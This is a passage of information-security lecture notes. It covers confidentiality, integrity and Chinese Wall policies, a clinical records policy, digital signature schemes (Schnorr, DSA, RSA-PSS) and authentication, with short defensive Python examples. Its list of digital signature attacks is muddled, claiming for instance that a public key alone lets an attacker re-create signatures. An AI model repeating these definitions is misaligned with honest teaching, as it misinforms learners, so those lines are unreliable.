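print(acm_allows("bob", "payroll.db", "write"))  # False: not in bob's cell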
Types of Confidentiality :
In Information Security, there are several types of confidentiality:
1. Data confidentiality: refers to the protection of data stored in computer systems and
networks from unauthorized access, use, disclosure, or modification. This is achieved
through various methods, such as encryption and access controls.
2. Network confidentiality: refers to the protection of information transmitted over
computer networks from unauthorized access, interception, or tampering. This is
achieved through encryption and secure protocols such as SSL/TLS.
3. End-to-end confidentiality: refers to the protection of information transmitted between
two endpoints, such as between a client and a server, from unauthorized access or
tampering. This is achieved through encryption and secure protocols.
4. Application confidentiality: refers to the protection of sensitive information processed
and stored by software applications from unauthorized access, use, or modification. This
is achieved through user authentication, access controls, and encryption of data stored in
the application.
5. Disk and file confidentiality: refers to the protection of data stored on physical storage
devices, such as hard drives, from unauthorized access or theft. This is achieved through
encryption, secure storage facilities, and access controls.
Overall, the goal of confidentiality in Information Security is to protect sensitive and
private information from unauthorized access, use, or modification and to ensure that only
authorized individuals have access to confidential information.
Uses of Confidentiality :
In the field of information security, confidentiality is used to protect sensitive data and
information from unauthorized access and disclosure. Some common uses include:
1. Encryption: Encrypting sensitive data helps to protect it from unauthorized access and
disclosure (a short sketch follows this list).
2. Access control: Confidentiality can be maintained by controlling who has access to
sensitive information and limiting access to only those who need it.
3. Data masking: Data masking is a technique used to obscure sensitive information, such
as credit card numbers or social security numbers, to prevent unauthorized access.
4. Virtual private networks (VPNs): VPNs allow users to securely connect to a network
over the internet and protect the confidentiality of their data in transit.
5. Secure file transfer protocols (SFTPs): SFTPs are used to transfer sensitive data
securely over the internet, protecting its confidentiality in transit.
6. Two-factor authentication: Two-factor authentication helps to ensure that only
authorized users have access to sensitive information by requiring a second form of
authentication, such as a fingerprint or a one-time code.
7. Data loss prevention (DLP): DLP is a security measure used to prevent sensitive data
from being leaked or lost. It monitors and controls the flow of sensitive data, protecting
its confidentiality.
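The sketch below illustrates use 1 (encryption) with the third-party Python cryptography package: without the key, the stored or transmitted token is unreadable, which is how encryption preserves confidentiality. The sample plaintext is an invented placeholder.

from cryptography.fernet import Fernet

# Symmetric encryption: anyone without the key sees only ciphertext.
key = Fernet.generate_key()        # keep this key secret; losing it loses the data
cipher = Fernet(key)

token = cipher.encrypt(b"customer record: account 0000, phone 000-0000")
print(token)                       # ciphertext: safe to store or transmit
print(cipher.decrypt(token))       # original bytes, recoverable only with the key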
Issues of Confidentiality :
Confidentiality in information security can be challenging to maintain, and there are several
issues that can arise, including:
1. Insider threats: Employees and contractors who have access to sensitive information
can pose a threat to confidentiality if they intentionally or accidentally disclose it.
2. Cyberattacks: Hackers and cybercriminals can exploit vulnerabilities in systems and
networks to access and steal confidential information.
3. Social engineering: Social engineers use tactics like phishing and pretexting to trick
individuals into revealing sensitive information, compromising its confidentiality.
4. Human error: Confidential information can be accidentally disclosed through human
error, such as sending an email to the wrong recipient or leaving sensitive information in
plain sight.
5. Technical failures: Technical failures, such as hardware failures or data breaches, can
result in the loss or exposure of confidential information.
6. Inadequate security measures: Inadequate security measures, such as weak passwords
or outdated encryption algorithms, can make it easier for unauthorized parties to access
confidential information.
7. Legal and regulatory compliance: Confidentiality can be impacted by legal and
regulatory requirements, such as data protection laws, that may require the disclosure of
sensitive information in certain circumstances.
Integrity policies:
Integrity is the protection of system data from intentional or accidental unauthorized
changes. The challenge of the security program is to ensure that data is maintained in the
state that is expected by the users. Although the security program cannot improve the
accuracy of the data that is put into the system by users, it can help ensure that any changes
are intended and correctly applied. An additional element of integrity is the need to protect
the process or program used to manipulate the data from unauthorized modification. A
critical requirement of both commercial and government data processing is to ensure the
integrity of data to prevent fraud and errors. It is imperative, therefore, that no user be able to
modify data in a way that might corrupt or lose assets or financial records, or render
decision-making information unreliable. Examples of government systems in which
integrity is crucial include air traffic control systems, military fire control systems, and social
security and welfare systems. Examples of commercial systems that require a high level of
integrity include medical prescription systems, credit reporting systems, production control
systems and payroll systems.
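A simple way to see the integrity goal in code is a checksum comparison, sketched below with Python's standard hashlib module. Storing a digest and recomputing it later detects unauthorized or accidental modification (it does not by itself prevent it); the record contents are invented for illustration.

import hashlib

# Store a SHA-256 digest of the data; any later change to the data changes
# the digest, signalling a possible integrity breach.
record = b"pay employee 4021 the amount of 2500.00"
stored_digest = hashlib.sha256(record).hexdigest()

tampered = b"pay employee 4021 the amount of 9500.00"
print(hashlib.sha256(tampered).hexdigest() == stored_digest)  # False: data was altered
print(hashlib.sha256(record).hexdigest() == stored_digest)    # True: data unchanged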
Protecting against Threats to Integrity: Like confidentiality, integrity can also be
compromised by hackers, masqueraders, unprotected downloaded files, LANs, unauthorized
user activities, and unauthorized programs like Trojan horses and viruses, because each of
these threats can lead to unauthorized changes to data or programs. For example,
unauthorized users can corrupt or change data and programs intentionally or accidentally if
their activities on the system are not properly controlled. Generally, three basic principles
are used to establish integrity controls:
1. Need-to-know access: Users should be granted access only to those files and programs
that they need in order to perform their assigned job functions.
2. Separation of duties: To ensure that no single employee has control of a transaction
from beginning to end, two or more people should be responsible for performing it.
3. Rotation of duties: Job assignments should be changed periodically so that it becomes
more difficult for users to collaborate to exercise complete control of a transaction
and subvert it for fraudulent purposes.
Integrity Models – Integrity models are used to describe what needs to be done to enforce
the information integrity policy. There are three goals of integrity, which the models
address in various ways:
1. Preventing unauthorized users from making modifications to data or programs.
2. Preventing authorized users from making improper or unauthorized modifications.
3. Maintaining internal and external consistency of data and programs.
Hybrid policies:
Chinese Wall Model. A security policy that refers equally to confidentiality and integrity; it
describes policies that involve conflict of interest in business.
Def: The objects of the database are items of information related to a company.
Def: A company dataset (CD) contains objects related to a single company.
Def: A Conflict Of Interest (COI) class contains the datasets of companies in competition.
CW-simple security condition: S can read O if and only if any of the following holds:
1. There is an object O′ such that S has accessed O′ and CD(O′) = CD(O).
2. For all objects O′ ∈ PR(S), COI(O′) ≠ COI(O), where PR(S) is the set of objects previously
read by S.
3. O is a sanitized object.
Subject effects:
a. Once a subject reads any object in a COI class, the only other objects in that COI class that
the subject can read lie in the same company dataset; that is, once one company dataset has
been read, no other company dataset in that COI class can be read.
b. The minimum number of subjects needed to access every object in a COI class is the same
as the number of company datasets in that class.
CW-*-Property:
A subject S may write to an object O if and only if both of the following conditions hold:
1. The CW-simple security condition permits S to read O.
2. For all unsanitized objects O′, if S can read O′, then CD(O′) = CD(O).
This prevents a subject from writing sensitive information from an unshared (company)
object into a shared common object.
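The CW-simple security condition above can be sketched directly in Python. The helper functions coi and cd (returning an object's conflict-of-interest class and company dataset) and the example objects are assumptions for illustration; the function covers only the read rule, not the CW-*-property.

# pr is the set of objects the subject has previously read; sanitized is the
# set of sanitized objects. coi(o) and cd(o) return an object's COI class
# and company dataset.
def cw_can_read(obj, pr, coi, cd, sanitized):
    if obj in sanitized:                                # condition 3
        return True
    if any(cd(prev) == cd(obj) for prev in pr):         # condition 1: same company dataset
        return True
    return all(coi(prev) != coi(obj) for prev in pr)    # condition 2: no prior read in this COI class

# Example: two banks in one COI class; reading bank_a blocks later reads of bank_b.
coi = {"bank_a_report": "banking", "bank_b_report": "banking"}.get
cd = {"bank_a_report": "bank_a", "bank_b_report": "bank_b"}.get
print(cw_can_read("bank_b_report", {"bank_a_report"}, coi, cd, set()))  # False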
Clinical Information Systems Security Policy
Electronic medical records present their own requirements for policies that combine
confidentiality and integrity.
Patient confidentiality, authentication of both records and those making entries in those
records, and assurance that the records have not been changed erroneously are most critical.
Def: A patient is the subject of medical records, or an agent for that person who can give
consent for the person to be treated.
Def: Personal health information (electronic medical record) is information about a patient’s
health or treatment enabling that patient to be identified.
Def: A clinician is a health-care professional who has access to personal health information
while performing his or her job.
Guided by the Clark-Wilson model, we have a set of principles that address electronic
medical records. Access to the electronic medical records must be restricted to the clinician
and the clinician’s practice group.
Access Principle 1: Each medical record has an access control list naming the individuals or
groups who may read and append information to the record. The system must restrict access
to those identified on the access control list. Medical ethics require that only clinicians and
the patient have access to the patient’s electronic medical records.
Access Principle 2: One of the clinicians on the access control list (called the responsible
clinician) must have the right to add other clinicians to the access control list. The patient
must consent to any treatment. Hence, the patient has the right to know when his or her
electronic medical records are accessed or altered. Also the electronic medical records system
must prevent the leakage of information. Hence, the patient must be notified when their
electronic medical records are accessed by a clinician that the patient does not know.
Access Principle 3: The responsible clinician must notify the patient of the names on the
access control list whenever the patient’s medical record is opened. Except in situations given
in statutes or in cases of emergency, the responsible clinician must obtain the patient’s
consent. Auditing who accesses the patient’s electronic medical records, when those records
were accessed, and what changes, if any, were made to the electronic medical records must
be recorded to adhere to numerous government medical information requirements.
Access Principle 4: The name of the clinician, the date, and the time of the access of a
medical record must be recorded. Similar information must be kept for deletions. The
following principles deal with record creation, and information deletion. New electronic
medical records should allow the attending clinician and the patient access to those records.
Additionally, the referring clinician, if any, should have access to those records to see the
results of any referral.
Creation Principle: A clinician may open a record, with the clinician and the patient on the
access control list. If the record is opened as a result of a referral, the referring clinician may
also be on the access control list. Electronic medical records should be kept the required
amount of time, normally 8 years except in some instances.
Deletion Principle: Clinical information cannot be deleted from a medical record until the
appropriate time has passed. When copying electronic medical records, care must be taken to
prevent the unauthorized disclosure of a patient’s medical records.
Aggregation Principle: Measures for preventing the aggregation of patient data must be
effective. In particular a patient must be notified if anyone is to be added to the access control
list for the patient’s record and if that person has access to a large number of medical records.
There must be system mechanisms implemented to enforce all of these principles.
Enforcement Principle: Any computer system that handles medical records must have a
subsystem that enforces the preceding principles. The effectiveness of this enforcement must
be subject to evaluation by independent auditors.
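A minimal sketch of how Access Principles 1, 2, and 4 might be realized in software, assuming a simple in-memory record with an access control list and an audit log; the class and method names (MedicalRecord, add_clinician, etc.) are illustrative, not prescribed by the policy.

from datetime import datetime, timezone

class MedicalRecord:
    def __init__(self, patient, responsible_clinician):
        # Access Principle 1: the ACL names who may read and append
        self.acl = {patient, responsible_clinician}
        self.responsible_clinician = responsible_clinician
        self.entries = []
        self.audit_log = []                       # Access Principle 4

    def add_clinician(self, requester, clinician, patient_notified):
        # Access Principle 2: only the responsible clinician extends the ACL;
        # Access Principle 3: the patient must be notified / must consent.
        if requester != self.responsible_clinician or not patient_notified:
            raise PermissionError("not permitted")
        self.acl.add(clinician)

    def append(self, clinician, text):
        if clinician not in self.acl:
            raise PermissionError("not on the access control list")
        self.entries.append(text)
        self.audit_log.append((clinician, datetime.now(timezone.utc), "append"))

    def read(self, clinician):
        if clinician not in self.acl:
            raise PermissionError("not on the access control list")
        self.audit_log.append((clinician, datetime.now(timezone.utc), "read"))
        return list(self.entries)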
UNIT III DIGITAL SIGNATURE AND AUTHENTICATION
DIGITAL SIGNATURE:
A digital signature is a mathematical technique used to validate the authenticity and integrity
of a digital document, message or software. It's the digital equivalent of a handwritten
signature or stamped seal, but it offers far more inherent security. A digital signature is
intended to solve the problem of tampering and impersonation in digital communications.
Digital signatures can provide evidence of origin, identity and status of electronic documents,
transactions or digital messages. Signers can also use them to acknowledge informed consent.
In many countries, including the U.S., digital signatures are considered legally binding in the
same way as traditional handwritten document signatures.
Digital signatures are based on public key cryptography, also known as asymmetric
cryptography. Using a public key algorithm -- such as Rivest-Shamir-Adleman, or RSA --
two keys are generated, creating a mathematically linked pair of keys: one private and one
public.
Digital signatures work through public key cryptography's two mutually authenticating
cryptographic keys. For encryption and decryption, the person who creates the digital
signature uses a private key to encrypt signature-related data. The only way to decrypt that
data is with the signer's public key.
If the recipient can't open the document with the signer's public key, that indicates there's a
problem with the document or the signature. This is how digital signatures are authenticated.
Digital certificates, also called public key certificates, are used to verify that a public key belongs to its claimed owner. Digital certificates contain the public key, information about its owner, expiration dates and the digital signature of the certificate's issuer. Digital certificates are issued by trusted third-party certificate authorities (CAs), such as DocuSign or GlobalSign, for example. The party sending the document and the person signing it must agree to use a given CA.
Digital signature technology requires all parties to trust that the person who creates the signature has kept the private key secret. If someone else gains access to the private signing key, that party could create fraudulent digital signatures in the name of the private key holder.
Timestamping. This provides the date and time of a digital signature and is useful when
timing is critical, such as for stock trades, lottery ticket issuance and legal proceedings.
Globally accepted and legally compliant. The public key infrastructure (PKI) standard
ensures vendor-generated keys are made and stored securely. With digital signatures
becoming an international standard, more countries are accepting them as legally binding.
Cost savings. Organizations can go paperless and save money previously spent on the
physical resources, time, personnel and office space used to manage and transport
documents.
Positive environmental effects. Reducing paper use also cuts down on the physical waste
generated by paper and the negative environmental impact of transporting paper
documents.
Traceability. Digital signatures create an audit trail that makes internal record-keeping
easier for businesses. With everything recorded and stored digitally, there are fewer
opportunities for a manual signee or record-keeper to make a mistake or misplace
something.
How do you create a digital signature?
To create a digital signature, signing software first computes a one-way hash of the data to be signed. A hash is a fixed-length string of letters and numbers generated by an algorithm. The digital signature creator's private key is then used to encrypt the hash. The encrypted hash -- along with other information, such as the hashing algorithm -- is the digital signature.
The reason for encrypting the hash instead of the entire message or document is that a hash function can convert an arbitrary input into a fixed-length value, which is usually much shorter. This saves time, as hashing is much faster than signing.
The value of a hash is unique to the hashed data. Any change in the data -- even a
modification to a single character -- results in a different value. This attribute enables others
to use the signer's public key to decrypt the hash to validate the integrity of the data.
If the decrypted hash matches a second computed hash of the same data, it proves that the
data hasn't changed since it was signed. But, if the two hashes don't match, the data has either
been tampered with in some way and is compromised or the signature was created with a
private key that doesn't correspond to the public key presented by the signer. This signals an
issue with authentication.
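The hash-then-sign flow just described can be sketched with the third-party Python cryptography package (assumed to be installed); RSA with PSS padding and SHA-256 are one common choice, used here purely for illustration.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.exceptions import InvalidSignature

# Key pair: the private key signs, the matching public key verifies.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

message = b"Transfer 100 units to account 42"

# Sign: the library hashes the message with SHA-256 and signs the digest.
signature = private_key.sign(
    message,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# Verify: raises InvalidSignature if the message or the signature was altered.
try:
    public_key.verify(
        signature,
        message,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                    salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )
    print("signature valid")
except InvalidSignature:
    print("signature invalid")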
The first step would be for you to type out the message or ready the file you want to send. Your private key works as the stamp for this file: your signing software hashes the file and encrypts the hash with your private key. Then you press send and the email reaches ABC Office via the internet.
In the second step, the ABC Office receives your file and verifies your signature using your public key, recomputing the hash and comparing it with the decrypted one.
In the final step, if the two hash values match, ABC Office knows the file really came from you and was not altered in transit. The private key itself is never shared; anyone without your public key, or anyone presented with a tampered file, will be unable to validate the signature.
A digital signature can be used with any kind of message, whether or not it's encrypted,
simply so the receiver can be sure of the sender's identity and that the message arrived intact.
Digital signatures make it difficult for the signer to deny having signed something, as the
digital signature is unique to both the document and the signer and it binds them together.
This property is called nonrepudiation.
The digital certificate is the electronic document that contains the digital signature of the
issuing CA. It's what binds together a public key with an identity and can be used to verify
that a public key belongs to a particular person or entity. Most modern email programs
support the use of digital signatures and digital certificates, making it easy to sign any
outgoing emails and validate digitally signed incoming messages.
Digital signatures are also used extensively to provide proof of authenticity, data integrity and
nonrepudiation of communications and transactions conducted over the internet.
Classes and types of digital signatures
There are three different classes of digital signature certificates (DSCs) as follows:
Class 1. This type of DSC can't be used for legal business documents, as they're validated
based only on an email ID and username. Class 1 signatures provide a basic level of
security and are used in environments with a low risk of data compromise.
Class 2. These DSCs are often used for electronic filing (e-filing) of tax documents,
including income tax returns and goods and services tax returns. Class 2 digital signatures
authenticate a signer's identity against a pre-verified database. Class 2 digital signatures
are used in environments where the risks and consequences of data compromise are
moderate.
Class 3. The highest level of digital signatures, Class 3 signatures require people or
organizations to appear in person before a CA to prove their identity before signing. Class 3
digital signatures are used for e-auctions, e-tendering, e-ticketing and court filings, as well
as in other environments where threats to data or the consequences of a security failure are
high.
Uses for digital signatures
Digital signature tools and services are commonly used in contract-heavy industries,
including the following:
Healthcare. Digital signatures are used in the healthcare industry to improve the
efficiency of treatment and administrative processes, strengthen data security, e-prescribe
and process hospital admissions. The use of digital signatures in healthcare must comply
with the Health Insurance Portability and Accountability Act of 1996.
Manufacturing. Manufacturing companies use digital signatures to speed up processes,
including product design, quality assurance, manufacturing enhancements, marketing and
sales. The use of digital signatures in manufacturing is governed by the International
Organization for Standardization and the National Institute of Standards and
Technology Digital Manufacturing Certificate.
Financial services. The U.S. financial sector uses digital signatures for contracts,
paperless banking, loan processing, insurance documentation and mortgages. This heavily
regulated sector uses digital signatures, paying careful attention to the regulations and
guidance put forth by the Electronic Signatures in Global and National Commerce Act (E-
Sign Act), state Uniform Electronic Transactions Act regulations, the Consumer Financial
Protection Bureau and the Federal Financial Institutions Examination Council.
Non-fungible tokens (NFTs). Digital signatures are used with digital assets -- such as
artwork, music and videos -- to secure and trace these types of NFTs anywhere on the
blockchain.
Security is the main benefit of using digital signatures. Security features and methods used in
digital signatures include the following:
PINs, passwords and codes. These are used to authenticate and verify a signer's identity
and approve their signature. Email, username and password are the most common methods
used.
Asymmetric cryptography. This employs a public key algorithm that includes private
and public key encryption and authentication.
Checksum. This long string of letters and numbers is used to determine the authenticity of
transmitted data. A checksum is the result of running a cryptographic hash function on a
piece of data. The value of the original checksum file is compared against the checksum
value of the calculated file to detect errors or changes. A checksum acts like a data
fingerprint.
CRC (cyclic redundancy check). A type of checksum, this error-detecting code and verification feature is used in digital networks and storage devices to detect changes to raw data.
CA validation. CAs issue digital signatures and act as trusted third parties by accepting,
authenticating, issuing and maintaining digital certificates. The use of CAs helps avoid the
creation of fake digital certificates.
TSP (trust service provider) validation. This person or legal entity validates a digital signature on a company's behalf and offers signature validation reports.
Digital signature attacks
Chosen-message attack. The attacker either obtains the victim's public key or tricks the
victim into digitally signing a document they don't intend to sign.
Known-message attack. The attacker obtains messages the victim sent and a key that
enables the attacker to forge the victim's signature on documents.
Key-only attack. The attacker only has access to the victim's public key and can re-create
the victim's signature to digitally sign documents or messages that the victim doesn't
intend to sign.
Digital signature tools and vendors
There are numerous e-signature tools and technologies on the market, including the
following:
Adobe Acrobat Sign is a cloud-based service that's designed to provide secure, legal e-
signatures across all device types. Adobe Acrobat Sign integrates with existing
applications, including Microsoft Office and Dropbox.
Dropbox Sign helps users prepare, send, sign and track documents. Features of the tool
include embedded signing, custom branding and embedded templates. Dropbox Sign also
integrates with applications such as Microsoft Word, Slack and Box.
GlobalSign provides a host of management, integration and automation tools to
implement PKI across enterprise environments.
PandaDoc provides e-signature software that helps users upload, send and collect
payments for documents. Users can also track document status and receive notifications
when someone opens, views, comments on or signs a document.
ReadySign from Onit provides users with customizable templates and forms for e-
signatures. Software features include bulk sending, notifications, reminders, custom
signatures and document management with role-based permissions.
Signeasy offers an e-signing service of the same name to businesses and individuals, as
well as application programming interfaces for developers.
SignNow, which is part of AirSlate Business Cloud, provides businesses with a PDF
signing tool.
As with the Elgamal digital signature scheme, the Schnorr signature scheme is
based on discrete logarithms [SCHN89, SCHN91]. The Schnorr scheme minimizes
the message-dependent amount of computation required to generate a signature.
The main work for signature generation does not depend on the message and can
be done during the idle time of the processor. The message-dependent part of the
signature generation requires multiplying a 2n-bit integer with an n-bit integer.
The scheme is based on using a prime modulus p, with p - 1 having a prime factor q of appropriate size; that is, p - 1 ≡ 0 (mod q). Typically, we use p ≈ 2^1024 and q ≈ 2^160. Thus, p is a 1024-bit number, and q is a 160-bit number, which is also the length of the SHA-1 hash value.
The first part of this scheme is the generation of a private/public key pair,
which consists of the following steps.
1. Choose primes p and q, such that q is a prime factor of p - 1.
2. Choose an integer a, such that a^q ≡ 1 (mod p). The values a, p, and q comprise a global public key that can be common to a group of users.
3. Choose a random integer s with 0 < s < q. This is the user's private key.
4. Calculate v = a^(-s) mod p. This is the user's public key.
A user with private key s and public key v generates a signature as follows.
1. Choose a random integer r with 0 < r < q and compute x = a^r mod p. This computation is a preprocessing stage independent of the message M to be signed.
2. Concatenate the message with x and hash the result to compute the value e:
e = H(M || x)
3. Compute y = (r + se) mod q. The signature consists of the pair (e, y).
Any other user can verify the signature as follows.
1. Compute x′ = a^y v^e mod p.
2. Verify that e = H(M || x′).
To see that the verification works, observe that
x′ ≡ a^y v^e ≡ a^y a^(-se) ≡ a^(y - se) ≡ a^r ≡ x (mod p)
Hence, H(M || x′) = H(M || x).
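The scheme above can be followed step by step in a toy implementation with deliberately tiny parameters (never usable in practice, where p ≈ 2^1024 and q ≈ 2^160); SHA-1 stands in for H, and the small primes p = 607 and q = 101 are chosen only so the example runs instantly.

import hashlib, secrets

# Toy global parameters: q is a prime factor of p - 1, and a has order q.
p, q = 607, 101
a = pow(2, (p - 1) // q, p)              # a**q % p == 1

def H(message: bytes, x: int) -> int:
    # e = H(M || x), with the hash digest interpreted as an integer
    return int.from_bytes(hashlib.sha1(message + str(x).encode()).digest(), "big")

# Key generation
s = secrets.randbelow(q - 1) + 1         # private key, 0 < s < q
v = pow(a, q - s, p)                     # public key, v = a**(-s) mod p

def sign(message: bytes):
    r = secrets.randbelow(q - 1) + 1     # fresh random r, 0 < r < q
    x = pow(a, r, p)                     # message-independent precomputation
    e = H(message, x)
    y = (r + s * e) % q
    return e, y                          # the signature is the pair (e, y)

def verify(message: bytes, e: int, y: int) -> bool:
    x_prime = (pow(a, y, p) * pow(v, e, p)) % p   # x' = a^y * v^e mod p
    return e == H(message, x_prime)

e, y = sign(b"hello")
print(verify(b"hello", e, y))            # True
print(verify(b"hacked", e, y))           # False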
Digital Signature Algorithm (DSA). The DSA makes use of the Secure Hash Algorithm (SHA). The DSA was originally proposed in 1991 and revised in 1993 in response to public feedback concerning the security of the scheme. There was a further minor revision in 1996. In 2000, an expanded version of the standard was issued as FIPS 186-2, subsequently updated to FIPS 186-3 in 2009 and FIPS 186-4 in 2013. This latest version also incorporates digital signature algorithms based on RSA and on elliptic curve cryptography; here we discuss DSA.
The DSA is designed to provide only the digital signature function; unlike RSA, it cannot be used for encryption or key exchange.
The signature of a message M consists of the pair of numbers r and s, which are
functions of the public key components (p, q, g), the user’s private key (x), the hash
code of the message H(M), and an additional integer k that should be generated
randomly or pseudorandomly and be unique for each signing.
Let M, r′, and s′ be the received versions of M, r, and s, respectively. Verification is performed by the receiver using a verification function: the receiver generates a quantity v that is a function of the public key components, the sender's public key, the hash code of the incoming message, and the received versions of r and s. If this quantity matches the r component of the signature, then the signature is validated.
In the RSA-PSS scheme, a random salt value is incorporated into the encoded message EM generated by the signer. The constants used in the encoding are known to the verifier, so that the
computed constants can be compared to the known constants as an additional check
that the signature is valid (in addition to comparing H and H′). The salt results in a
different signature every time a given message is signed with the same private key.
The verifier does not know the value of the salt and does not attempt a comparison.
Thus, the salt plays a similar role to the pseudorandom variable k in the NIST DSA
and in ECDSA. In both of those schemes, k is a pseudorandom number generated by
the signer, resulting in different signatures from multiple signings of the same message
with the same private key. A verifier does not and need not know the value of k.
Sender Side : In DSS Approach, a hash code is generated out of the message and following
inputs are given to the signature function –
1. The hash code.
2. The random number ‘k’ generated for that particular signature.
3. The private key of the sender i.e., PR(a).
4. A global public key (which is a set of parameters for the communicating principals), i.e.,
PU(g).
These input to the function will provide us with the output signature containing two
components – ‘s’ and ‘r’. Therefore, the original message concatenated with the signature is sent to the receiver.
Receiver Side: At the receiver end, verification of the sender is done.
The hash code of the sent message is generated. There is a verification function which takes
the following inputs –
1. The hash code generated by the receiver.
2. Signature components ‘s’ and ‘r’.
3. Public key of the sender.
4. Global public key.
The output of the verification function is compared with the signature component ‘r’. Both values will match if the sent signature is valid, because only the sender can generate a valid signature with the help of its private key.
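The same sender/receiver flow can be sketched with the third-party Python cryptography package (assumed to be available); the library generates the DSA domain parameters and the per-signature random k internally, and returns (r, s) as one DER-encoded blob.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.exceptions import InvalidSignature

private_key = dsa.generate_private_key(key_size=2048)   # generates p, q, g and x
public_key = private_key.public_key()                   # y = g^x mod p

message = b"message to be signed"

# Sender side: hash code of M plus a fresh random k produce the pair (r, s).
signature = private_key.sign(message, hashes.SHA256())

# Receiver side: the verification function recomputes v and compares it with r.
try:
    public_key.verify(signature, message, hashes.SHA256())
    print("signature valid")
except InvalidSignature:
    print("signature invalid")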
Benefits of digital signatures:
1. A digital signature provides better security in a transaction; an unauthorized person cannot commit fraud in the exchange.
2. You can easily track the status of the documents to which a digital signature has been applied.
3. High-speed document delivery.
4. It is fully legal when issued by a government-authorized certifying authority.
5. If you have signed a document digitally, you cannot later deny having done so.
6. When a document is signed, the date and time are automatically stamped on it.
7. It is practically impossible to copy or alter a digitally signed document.
8. Identification of the person who signs.
9. Elimination of the possibility of fraud being committed by an impostor.
Authentication:
Authentication is the process of verifying the identity of a user or information. User
authentication is the process of verifying the identity of a user when that user logs in to a
computer system.
There are different types of authentication systems which are: –
1. Single-Factor authentication: – This was the first method of security that was developed. In this authentication system, the user has to enter the username and the password to confirm their identity. If the username or password is wrong, the user is not allowed to log in or access the system.
Advantages of the Single-Factor Authentication System: –
It is a very simple and straightforward system to use.
It is not costly.
The user does not need advanced technical skills.
Disadvantages of Single-Factor Authentication
Its security depends entirely on the strength of the password entered by the user.
The protection level of Single-Factor Authentication is low.
2. Two-factor Authentication: – In this authentication system, the user has to give a username, a password, and one additional piece of information. There are various types of second factors used to secure the system, such as wireless tokens, virtual tokens, OTPs, and more.
Advantages of the Two-Factor Authentication
The Two-Factor Authentication System provides better security than the Single-factor
Authentication system.
The productivity and flexibility increase in the two-factor authentication system.
Two-Factor Authentication prevents the loss of trust.
Disadvantages of Two-Factor Authentication
It is time-consuming.
3. Multi-Factor Authentication: – In this type of authentication, more than one factor of authentication is needed. This gives better security to the user. Keylogger and phishing attacks become far less effective against a Multi-Factor Authentication system, which assures the user that their information is much harder to steal.
The advantages of the Multi-Factor Authentication System are: –
Greatly reduced security risk.
Information is far less likely to be stolen.
Protection against key-logger activity.
Protection against data capture.
The disadvantages of the Multi-Factor Authentication System are: –
It is time-consuming.
It can rely on third parties.
The main objective of authentication is to allow authorized users to access the computer and to deny access to unauthorized users. Operating systems generally identify/authenticate users in the following three ways: passwords, physical identification, and biometrics. These are explained below.
1. Passwords: Password verification is the most popular and commonly used authentication technique. A password is a secret text that is supposed to be known only to a user. In a password-based system, each user is assigned a valid username and password by the system administrator. The system stores all usernames and passwords. When a user logs in, their username and password are verified by comparing them with the stored login name and password. If the contents match, the user is allowed to access the system; otherwise, access is rejected. (A minimal code sketch of password verification appears after this list.)
2. Physical Identification: This technique includes machine-readable badges(symbols),
cards, or smart cards. In some companies, badges are required for employees to gain
access to the organization’s gate. In many systems, identification is combined with
the use of a password, i.e., the user must insert the card and then supply his/her
password. This kind of authentication is commonly used with ATMs. Smart cards can
enhance this scheme by keeping the user password within the card itself. This allows
authentication without the storage of passwords in the computer system. The loss of
such a card can be dangerous.
3. Biometrics: This method of authentication is based on the unique biological characteristics of each user such as fingerprints, voice or face recognition, signatures, and eyes. A biometric system typically needs:
• A scanner or other device to gather the necessary data about the user.
• Software to convert the data into a form that can be compared and stored.
• A database that stores information for all authorized users.
Commonly used biometric characteristics include:
• Facial Characteristics – Humans are differentiated on the basis of facial characteristics such as eyes, nose, lips, eyebrows, and chin shape.
• Fingerprints – Fingerprints are believed to be unique across the entire human population.
• Hand Geometry – Hand geometry systems identify features of the hand that include the shape, length, and width of fingers.
• Retinal pattern – It is concerned with the detailed structure of the eye.
• Signature – Every individual has a unique style of handwriting, and this feature is reflected in the signatures of a person.
• Voice – This method records the frequency pattern of the voice of an individual speaker.
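A minimal sketch of the password verification described in item 1 of the list above, with one important change: instead of storing the password itself (as the simplified description implies), the system stores a random salt and a slow PBKDF2 hash, which is the usual safeguard in practice.

import hashlib, hmac, os

def register(password: str):
    # Store a random salt and a salted, slow hash -- never the password itself.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def login(password: str, salt: bytes, stored_digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    # Constant-time comparison of the stored and freshly computed hashes.
    return hmac.compare_digest(candidate, stored_digest)

salt, digest = register("correct horse battery staple")
print(login("correct horse battery staple", salt, digest))   # True -> access granted
print(login("wrong password", salt, digest))                 # False -> rejected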
Authentication Requirements:
Authentication Requirements In the context of communications across a network, the
following attacks can be identified:
1. Disclosure: Release of message contents to any person or process not possessing the appropriate cryptographic key.
2. Traffic analysis: Discovery of the pattern of traffic between parties.
3. Masquerade: Insertion of messages into the network from a fraudulent source. This
includes the creation of messages by an opponent that are purported to come from an
authorized entity. Also included are fraudulent acknowledgments of message receipt or
nonreceipt by someone other than the message recipient.
Message authentication is a procedure to verify that received messages come from the
alleged source and have not been altered. Message authentication may also verify sequencing
and timeliness.
At the lower level, there must be some sort of function that produces an authenticator: a value to be used to authenticate a message. This lower-level function is then used as a primitive in a higher-level authentication protocol that enables a receiver to verify the authenticity of a message. This section is concerned with the types of functions that may be used to produce an authenticator. These functions may be grouped into three classes, as follows:
1. Message Encryption: The ciphertext of the entire message serves as its authenticator.
2. Message Authentication Code (MAC): A public function of the message and a secret key that produces a fixed-length value that serves as the authenticator.
3. Hash Functions: A public function that maps a message of any length into a fixed-length hash value, which serves as the authenticator.
We will mainly be concerned with the last class of function; however, it must be noted that hash functions and MACs are very similar, except that a hash code does not require a secret key. With regard to the first class, it provides authentication by virtue of the fact that only the sender and receiver know the key; therefore, the message could only have come from the sender. However, there is also the problem that the plaintext should be recognisable as a plaintext message (for example, if it were some sort of digitised X-ray, it might not be).
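A short sketch contrasting the second and third classes above, using only Python's standard library: HMAC-SHA-256 is used here as one common MAC construction, while a plain SHA-256 digest illustrates an unkeyed hash.
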